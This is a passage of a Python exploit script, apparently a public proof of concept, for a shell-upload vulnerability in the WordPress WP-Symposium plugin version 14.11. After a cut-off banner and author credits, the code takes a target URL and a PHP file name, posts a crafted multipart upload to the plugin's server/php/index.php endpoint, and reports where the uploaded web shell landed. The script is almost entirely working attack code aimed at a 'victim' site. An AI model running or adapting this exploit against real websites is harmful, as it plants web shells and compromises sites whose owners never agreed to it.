 |.  |   |.  1   |______|   1___|  |  |        |  _  |  _  |__ --|  |  |  |        |
 |. / \  |.  ____|      |____   |___  |__|__|__|   __|_____|_____|__|_____|__|__|__|
 |:      |:  |          |:  1   |_____|        |__|
 |::.|:. |::.|          |::.. . |
 `--- ---`---'          `-------'
                                                              Wp-Symposium
                                                      Sh311 Upl04d Vuln3r4b1l1ty
                                                                v14.11
 
                                 Written by:
 
                               Claudio Viviani
 
                            http://www.homelab.it
 
                               info@homelab.it
                           homelabit@protonmail.ch
 
                      https://www.facebook.com/homelabit
                        https://twitter.com/homelabit
                      https://plus.google.com/+HomelabIt1/
             https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
 
commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('-f', '--file', action="store",
                  help="Insert file name, ex: shell.php",
                  )
commandList.add_option('--timeout', action="store", default=10, type="int",
                  help="[Timeout Value] - Default 10",
                  )
 
options, remainder = commandList.parse_args()
 
# Check args
if not options.target or not options.file:
    print(banner)
    commandList.print_help()
    sys.exit(1)
 
payloadname = checkfile(options.file)
host = checkurl(options.target)
timeout = options.timeout
 
print(banner)
 
socket.setdefaulttimeout(timeout)
 
url_symposium_upload = host+'/wp-content/plugins/wp-symposium/server/php/'
 
content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
 
randDirName = id_generator()
randShellName = id_generator()
 
bodyupload = create_body_sh3ll_upl04d(payloadname, randDirName, randShellName)
 
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
           'content-type': content_type,
           'content-length': str(len(bodyupload)) }
 
try:
    req = urllib2.Request(url_symposium_upload+'index.php', bodyupload, headers)
    response = urllib2.urlopen(req)
    read = response.read()
 
    if "error" in read or read == "0" or read == "":
       print("[X] Upload Failed :(")
    else:
       print("[!] Shell Uploaded")
       print("[!] Location: "+url_symposium_upload+randDirName+randShellName+".php\n")
 
except urllib2.HTTPError as e:
    print("[X] "+str(e))
except urllib2.URLError as e:
    print("[X] Connection Error: "+str(e))

(96)